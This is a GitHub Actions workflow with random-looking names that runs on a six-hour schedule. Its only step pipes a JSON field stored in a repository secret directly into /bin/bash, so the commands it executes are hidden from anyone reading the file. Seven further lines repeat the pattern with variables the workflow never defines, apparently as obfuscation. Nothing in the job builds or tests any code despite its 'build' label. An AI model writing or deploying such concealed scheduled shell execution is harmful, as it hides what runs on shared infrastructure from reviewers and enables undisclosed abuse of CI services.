name: diebafuma

on:
  workflow_dispatch:
  schedule:
    - cron: '2 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: diebafuma
        env:
          ol62280: ${{ secrets.ol62280 }}
        run: |
          echo $ol62280 | jq -r .akjm3 | /bin/bash
          echo $jzak24 | jq -r .yvagv6236 | /bin/bash
          echo $suijs4 | jq -r .qddp436 | /bin/bash
          echo $vgjn26061 | jq -r .q4 | /bin/bash
          echo $n79 | jq -r .ye032 | /bin/bash
          echo $juv3399 | jq -r .fuw768 | /bin/bash
          echo $nti81807 | jq -r .e69938 | /bin/bash
          echo $dxs89 | jq -r .f826 | /bin/bash

